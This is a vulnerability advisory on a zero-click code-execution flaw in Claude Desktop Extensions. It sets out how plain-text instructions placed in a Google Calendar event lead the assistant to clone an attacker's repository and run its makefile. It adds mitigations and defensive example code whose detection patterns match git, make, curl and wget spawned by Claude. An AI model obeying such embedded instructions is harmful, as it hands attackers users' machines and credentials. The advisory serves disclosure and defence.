MNSA-2026-001

Zero-Click Remote Code Execution in Claude Desktop Extensions

Severity: Critical (CVSS 10.0)
Published: 2026-02-09
Last Updated: 2026-02-09
Prepared by: Monachus Solutions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-94
Affected Product: Claude Desktop with DXT Extensions
Affected Versions: All versions with DXT enabled
Fixed Versions: No patch available

Executive Summary

A critical zero-click remote code execution vulnerability in Claude Desktop Extensions (DXT) allows full system compromise through a weaponized Google Calendar event, with no user interaction required. Disclosed on February 9, 2026 by LayerX Security researcher Roy Paz, the vulnerability exploits the absence of trust boundaries between read-only MCP connectors and high-privilege local executors.

Anthropic was notified through responsible disclosure and acknowledged the findings, but no remediation timeline has been provided as of the publication date. LayerX reports that Anthropic characterized the root cause as architectural rather than a localized bug. Organizations running Claude Desktop with DXT extensions face an immediate, unpatched threat that demands compensating controls or tool removal.

Vulnerability Details

Field              | Details
-------------------|--------------------------------------------------------------------------
Vulnerability Type | Zero-click Remote Code Execution
CVSS Score         | 10.0 / 10.0 (self-assessed by LayerX)
CVE ID             | Not assigned
Affected Product   | Claude Desktop with DXT extensions enabled
Attack Vector      | Malicious Google Calendar event (network-accessible, zero authentication)
Vendor Response    | Acknowledged; no remediation timeline provided
Estimated Exposure | 10,000+ active users; all 50 published DXT extensions

Attack Chain: How a Calendar Invite Achieves Full System Compromise

The attack chain, demonstrated with a working proof-of-concept, requires no adversarial prompt engineering, no obfuscation, and no social engineering beyond placing a single malicious calendar event on the target’s Google Calendar.

  1. Weaponized Calendar Event: An attacker creates a Google Calendar event (e.g., titled “Task Management”) containing plain-text instructions in the event description directing Claude to clone a malicious repository and execute its makefile.
  2. Routine User Prompt: A victim with Claude Desktop Extensions installed — including both a Google Calendar connector and a local executor like Desktop Commander — issues a routine prompt such as “Please check my latest events in Google Calendar and then take care of it for me.”
  3. Autonomous Tool Chaining: Claude autonomously reads the calendar event via the Google Calendar MCP connector, interprets the embedded instructions as actionable tasks, and forwards them to the Desktop Commander MCP extension, which executes git pull from the attacker’s repository and runs the retrieved makefile.
  4. Full System Compromise: The attacker achieves arbitrary code execution on the victim’s machine with full user privileges — access to SSH keys, AWS credentials, browser passwords, file systems, and OS settings.

KEY PREREQUISITE: Exploitability is not universal: the victim must have both a Google Calendar MCP connector and a local code-execution connector installed, and must issue a sufficiently open-ended prompt. However, this combination is common among power users, and the attack surface — publicly accessible calendar events — is trivially reachable.

Anthropic’s Response and the Architectural Impasse

According to LayerX, Anthropic was approached with the findings and acknowledged the issue, but has not committed to a remediation timeline. LayerX reports that Anthropic characterized the root cause as architectural. No official public statement from Anthropic was found on their website, documentation, status page, or GitHub repositories as of the publication date — though the same-day timing of the disclosure may account for this.

The architectural root cause is that DXT extensions run unsandboxed with full system privileges — unlike Chrome extensions, which operate inside tightly sandboxed browser environments. All installed MCP connectors are treated as flat-privileged peers: Claude autonomously determines which connectors to chain together, with no hardcoded safeguards preventing a low-risk data connector from triggering high-privilege local execution.

This contrasts with Anthropic’s response to the “PromptJacking” vulnerabilities discovered by Koi Security in July 2025 (CVSS 8.9), which were fully patched in Claude Desktop v0.1.9 by September 19, 2025. The distinction is revealing: Anthropic has remediated localized code-level bugs but appears unwilling or unable to address systemic architectural deficiencies in how MCP connectors interact.

MCP Ecosystem Vulnerability Timeline

The LayerX finding is the latest in a cascading series of MCP security failures throughout 2025–2026. An independent analysis of 100 Claude MCP servers found critical security vulnerabilities in 43%.

Date     | Incident                                                                               | Severity | Researcher
---------|----------------------------------------------------------------------------------------|----------|---------------------
Apr 2025 | WhatsApp MCP tool poisoning: chat history exfiltrated via sleeper tool                 | Critical | Invariant Labs
May 2025 | GitHub MCP prompt injection: private repo data exfiltrated via poisoned public issue   | Critical | Invariant Labs
Jun 2025 | MCP Inspector RCE (CVE-2025-49596): unauthenticated code execution via dev tool        | Critical | Security researchers
Jul 2025 | mcp-remote command injection (CVE-2025-6514, CVSS 9.6): 437K+ downloads affected       | Critical | JFrog Security
Aug 2025 | Filesystem MCP Server sandbox escape (CVE-2025-53109/53110)                            | Critical | Cymulate
Sep 2025 | Malicious Postmark MCP server BCC’d all emails to attacker                             | Critical | IT Pro
Oct 2025 | Smithery MCP hosting supply-chain breach: 3,000+ apps compromised                      | Critical | GitGuardian
Nov 2025 | Koi Security PromptJacking RCE (CVSS 8.9): patched in v0.1.9                           | High     | Koi Security
Jan 2026 | PromptArmor: Claude Cowork file exfiltration via prompt injection                      | High     | PromptArmor
Feb 2026 | LayerX: zero-click Calendar to Desktop Commander RCE (CVSS 10)                         | Critical | LayerX

Competitive Landscape: Trust Boundaries

Every major AI platform faces the fundamental tension of mixing untrusted external content with privileged system operations. Claude Desktop Extensions have the weakest sandboxing posture among the four platforms compared.

Platform                  | Sandboxing Posture    | Key Defenses
--------------------------|-----------------------|----------------------------------------------------------------------------------
Google (Strongest)        | Multi-tier sandboxing | User Alignment Critic model, macOS Seatbelt, Docker/Podman containers
Microsoft (Battle-tested) | Defense-in-depth      | Prompt injection classifiers, instruction hierarchy, Entra ID scoping
OpenAI (Granular)         | Per-tool isolation    | OAuth 2.1 with PKCE, manual user confirmation for writes, tiered sandbox via MDM
Anthropic DXT (Weakest)   | No sandboxing         | Extensions run unsandboxed with full system privileges; no trust boundaries

Google (strongest): Chrome’s agentic browsing deploys a User Alignment Critic — a second, isolated Gemini model that independently vets every proposed agent action. Gemini CLI offers multi-tier sandboxing (macOS Seatbelt, Docker/Podman containers).

Microsoft (most battle-tested): Defense-in-depth combines prompt injection classifiers, instruction hierarchy training, and architectural containment via Entra ID identity scoping.

OpenAI (most granular): The Apps SDK enforces per-tool OAuth 2.1 scopes with PKCE, requiring manual user confirmation for write operations. Codex CLI provides tiered sandbox modes.

Anthropic DXT (weakest): Extensions run unsandboxed with full system privileges and no trust boundaries between connector types. Claude Code does implement OS-level sandboxing, demonstrating the capability exists but has not been applied to DXT.

SOC 2 Compliance Implications

Organizations using Claude Desktop with DXT extensions face material compliance exposure. A vendor that has acknowledged a CVSS 10.0 vulnerability without providing a remediation timeline creates an auditable condition requiring documented risk acceptance or tool removal.

CC6.1 / CC6.3 — Logical Access Controls

Absence of privilege separation between connector types violates least-privilege requirements. Auditors will examine whether AI tool permissions are documented with distinct privilege tiers.

CC7.1 / CC7.2 — System Operations

Zero-click, no-indicator attacks demand AI-specific behavioral monitoring, audit logs of all AI agent tool invocations, and anomaly detection for AI-initiated operations.

CC8.1 — Change Management

One-click DXT installation bypasses typical change management rigor. Each extension materially alters the attack surface and should require formal security review.

CC9.2 — Vendor Risk Management

Continuing to use a product with an acknowledged, unpatched CVSS 10.0 vulnerability may constitute a control deficiency. Auditors may issue an exception or qualified opinion absent robust compensating controls.

ISO 27001:2022 Compliance Implications

A.8.9 — Configuration Management

Default configuration allows unrestricted cross-connector chaining. Secure configuration baselines must enforce boundaries between connector types.

A.5.23 — Cloud Services Security

Google Calendar connector data flowing into local system execution is exactly the boundary this control requires organizations to manage.

A.8.8 — Technical Vulnerability Management

An unremediable CVSS 10.0 vulnerability must be managed through compensating controls, documented risk acceptance, or tool removal. ISO auditors could issue a nonconformity.

A.5.19 / A.5.22 — Supplier Relationships

Anthropic’s acknowledgment of the vulnerability without a remediation timeline must be documented and escalated through the supplier risk management process.

Immediate Mitigation Recommendations

Tier 1 — Immediate (Within 24–48 Hours)

  • Inventory: Conduct a full inventory of all Claude Desktop installations and their installed DXT extensions across the organization.
  • Identify risk combinations: Flag any systems running both an external-facing connector (Google Calendar, Gmail, cloud services) and a local executor (Desktop Commander, terminal, git, filesystem).
  • Sever the chain: On flagged systems, disable either the external connector or the local executor immediately. These two categories must not coexist on the same installation until Anthropic implements trust boundaries.
  • Isolate if required: If business requirements demand both capabilities, isolate Claude Desktop in a dedicated VM or container with no access to production credentials, sensitive files, or network resources.
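One way to automate the inventory and risk-combination steps above, as an added example that is not part of the advisory or of Anthropic's tooling; the inventory format (hostname to installed connector names) and the keyword-based classifier are assumptions, and the sample inventory is constructed:

```python
import json
import re

# Keyword patterns are an assumption, derived from the connector categories the
# advisory names (external-facing data sources vs local executors).
EXTERNAL_PATTERNS = [r"calendar", r"gmail", r"\bmail\b", r"drive", r"slack", r"cloud"]
EXECUTOR_PATTERNS = [r"desktop.?commander", r"terminal", r"shell", r"\bgit\b", r"filesystem"]


def classify(name: str) -> str:
    """Map a connector name to 'executor', 'external' or 'other'."""
    n = name.lower()
    # Executor check runs first: a connector that can run code is the higher risk.
    if any(re.search(p, n) for p in EXECUTOR_PATTERNS):
        return "executor"
    if any(re.search(p, n) for p in EXTERNAL_PATTERNS):
        return "external"
    return "other"


def flag_risky_hosts(inventory: dict) -> dict:
    """Return hosts where at least one external connector and one executor coexist,
    with the offending connector names grouped by category."""
    flagged = {}
    for host, connectors in inventory.items():
        groups = {"external": [], "executor": []}
        for name in connectors:
            kind = classify(name)
            if kind in groups:
                groups[kind].append(name)
        if groups["external"] and groups["executor"]:
            flagged[host] = groups
    return flagged


# Constructed sample inventory (hostname -> installed connector/extension names);
# a real inventory would come from endpoint management tooling.
SAMPLE_INVENTORY = json.loads("""{
  "ws-finance-01": ["Google Calendar", "Desktop Commander", "Notes"],
  "ws-eng-07": ["Gmail", "Slack"],
  "ws-eng-12": ["Filesystem", "Terminal"]
}""")

if __name__ == "__main__":
    for host, groups in flag_risky_hosts(SAMPLE_INVENTORY).items():
        print(f"{host}: sever the chain, external={groups['external']} executor={groups['executor']}")
```

Only hosts carrying both categories are reported; hosts with two executors or two external connectors do not match the advisory's risk combination and stay quiet.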

Tier 2 — Short-Term (Within 1–2 Weeks)

  • EDR rules: Deploy endpoint detection rules monitoring Claude Desktop child processes for anomalous git operations, terminal execution, filesystem writes, and outbound connections to unknown endpoints.
  • Network controls: Restrict repositories and external resources accessible to Claude Desktop.
  • Policy controls: Configure enterprise Group Policy or MDM to blocklist high-risk DXT extensions where not strictly required.
  • Human-in-the-loop: Establish a mandatory policy requiring explicit user confirmation before any AI-initiated code execution.
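A starting point for the EDR rule in the first bullet, as an added example that is not from the advisory or from any EDR vendor; the event shape (JSON lines with host, root-to-leaf ancestry, image and cmdline) and a Claude Desktop process name containing "claude" are assumptions, and the events are constructed:

```python
import json
import re
from typing import Dict, List

# Assumptions: the EDR exports process-creation events as JSON lines with host,
# ancestry (root-to-leaf process image names), image and cmdline fields, and the
# Claude Desktop process name contains "claude".
CLAUDE_ANCESTOR = re.compile(r"claude", re.I)
RISKY_IMAGE = re.compile(r"(^|[\\/])(git|make|sh|bash|zsh|cmd\.exe|powershell\.exe)$", re.I)
RISKY_CMDLINE = re.compile(r"\b(git\s+(clone|pull|fetch)|make\b|curl\b|wget\b)", re.I)


def spawned_by_claude(event: Dict) -> bool:
    """True when Claude Desktop (or one of its MCP server children) is an ancestor."""
    return any(CLAUDE_ANCESTOR.search(a) for a in event.get("ancestry", []))


def detect(events: List[Dict]) -> List[Dict]:
    """Return one alert per event that sits in Claude's process lineage and runs
    VCS, build or shell tooling; the same commands from a user's terminal are ignored."""
    alerts = []
    for e in events:
        if not spawned_by_claude(e):
            continue
        if RISKY_IMAGE.search(e.get("image", "")) or RISKY_CMDLINE.search(e.get("cmdline", "")):
            alerts.append({"host": e["host"], "cmdline": e["cmdline"],
                           "lineage": " > ".join(e["ancestry"])})
    return alerts


# Constructed sample events: two model the advisory's chain (git pull, then make,
# under a Claude-spawned MCP server process), two are benign.
SAMPLE_EVENTS = [json.loads(line) for line in """
{"host": "ws-finance-01", "ancestry": ["Claude", "node"], "image": "/usr/bin/git", "cmdline": "git pull https://repo.invalid/tasks.git"}
{"host": "ws-finance-01", "ancestry": ["Claude", "node", "sh"], "image": "/usr/bin/make", "cmdline": "make"}
{"host": "ws-eng-07", "ancestry": ["Terminal", "zsh"], "image": "/usr/bin/git", "cmdline": "git pull origin main"}
{"host": "ws-eng-07", "ancestry": ["Claude", "node"], "image": "/usr/bin/node", "cmdline": "node calendar-server.js"}
""".strip().splitlines()]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The lineage check is what keeps the rule useful: git and make are routine on developer workstations, so the signal is Claude Desktop, not the tool, being the ancestor.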

Tier 3 — Medium-Term (Within 30 Days)

  • Risk register: Formally document a Critical severity entry with monthly review cadence.
  • Auditor memo: For SOC 2 or ISO 27001 certified organizations, prepare documentation of the vulnerability, Anthropic’s response, compensating controls, and formal risk acceptance signed by CISO.
  • Evaluate alternatives: Assess Claude Code (OS-level sandboxing), Google Gemini CLI (multi-tier sandbox), or OpenAI Codex (tiered sandbox with MDM enforcement).
  • Tabletop exercise: Conduct an AI-agent-mediated system compromise scenario to validate incident response readiness.

Tier 4 — Strategic

  • Monitor: Track Anthropic’s engineering blog and DXT documentation for architectural security improvements.
  • Engage vendor: Request a formal remediation timeline through enterprise support channels.
  • Industry participation: Contribute to OWASP’s Agentic Applications working group and incorporate AI agent tool-use security into vendor assessment frameworks.

Conclusion

This vulnerability crystallizes a systemic challenge facing the entire AI agent ecosystem: the trust boundary problem is architectural, not incidental. When an AI model autonomously decides which tools to chain together, and those tools span the spectrum from reading public calendar data to executing arbitrary system commands, every connected data source becomes an attack surface for full system compromise.

The critical insight is not that Claude Desktop has a bug — it is that the MCP connector architecture was designed for capability without corresponding security isolation. Anthropic’s willingness to patch localized code-level flaws while not yet addressing the systemic trust-boundary issue suggests an unresolved tension between usability and security in the agent-tool paradigm.

KEY TAKEAWAY: For organizations today, the calculus is straightforward: external-facing MCP connectors and high-privilege local executors must not coexist on the same Claude Desktop installation until Anthropic implements privilege separation, sandboxing, or mandatory confirmation gates for cross-connector tool chaining. The compliance implications are equally clear — a CVSS 10.0 vulnerability with unavailable remediation demands either compensating controls robust enough to satisfy auditors or removal of the tool from production environments.
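The confirmation gate for cross-connector chaining that the takeaway calls for, sketched as an added example rather than any Anthropic or DXT code; the connector tiers, the provenance-tagging approach and the confirm callback are assumptions, and the connector implementations are constructed stand-ins:

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple

@dataclass
class Tainted:
    """A tool input or output plus the set of connectors whose data shaped it."""
    value: str
    sources: Set[str] = field(default_factory=set)

class GatedDispatcher:
    """Routes tool calls under one rule: an executor-tier connector may not act on
    data that came out of an external-tier connector without human approval."""

    def __init__(self, tiers: Dict[str, str], confirm: Callable[[str, Tainted], bool]):
        self.tiers = tiers      # connector name -> "external" | "executor" | "local"
        self.confirm = confirm  # human-in-the-loop callback (a UI prompt in practice)
        self.audit: List[Tuple[str, List[str], bool]] = []

    def call(self, connector: str, tool_input: Tainted, impl: Callable[[str], str]) -> Tainted:
        tier = self.tiers.get(connector, "executor")  # unknown connector: fail closed
        external = sorted(s for s in tool_input.sources if self.tiers.get(s) == "external")
        if tier == "executor" and external:
            approved = self.confirm(connector, tool_input)
            self.audit.append((connector, external, approved))
            if not approved:
                raise PermissionError(f"{connector} refused: input derived from {external}")
        # Every output inherits its input's provenance plus this connector.
        return Tainted(impl(tool_input.value), set(tool_input.sources) | {connector})

TIERS = {"google-calendar": "external", "desktop-commander": "executor", "notes": "local"}

def scenario(user_approves: bool) -> str:
    """Replay the advisory's chain (calendar read feeding the executor) and report
    whether the gate let it through."""
    d = GatedDispatcher(TIERS, confirm=lambda connector, data: user_approves)
    # Constructed stand-ins for the real connectors' implementations.
    event = d.call("google-calendar", Tainted("list my events"), lambda q: "event description text")
    try:
        d.call("desktop-commander", event, lambda cmd: "ran")
        return "executed"
    except PermissionError:
        return "blocked"

def user_directed() -> str:
    # Input typed by the user carries no external taint, so the gate does not fire.
    d = GatedDispatcher(TIERS, confirm=lambda connector, data: False)
    return d.call("desktop-commander", Tainted("ls"), lambda cmd: "ran").value
```

The audit list doubles as the tool-invocation log that the CC7 section asks for: every gated decision records the executor, the external sources that tainted its input, and whether a human approved it.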

References

  • LayerX Security: Claude Desktop Extensions RCE — layerxsecurity.com/blog/claude-desktop-extensions-rce/
  • Infosecurity Magazine: Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection
  • Koi Security: PromptJacking Critical RCEs in Claude Desktop
  • JFrog Security: CVE-2025-6514 Critical MCP Remote RCE Vulnerability
  • AuthZed: A Timeline of Model Context Protocol Security Breaches
  • OWASP Top 10 for Agentic Applications (December 2025)
  • Anthropic: Responsible Disclosure Policy — anthropic.com/responsible-disclosure-policy
  • Anthropic Engineering: Claude Code Sandboxing
  • Noma Security: GeminiJack Zero-Click Vulnerability
  • Microsoft Learn: Security for Microsoft 365 Copilot
  • OpenAI: Apps SDK Security & Privacy; Codex Security
  • Greshake et al. (AISec@CCS 2023): Indirect Prompt Injection in LLM-Integrated Applications
  • InjecAgent (ACL 2024): Benchmarking Indirect Prompt Injections in Tool-Integrated LLM Agents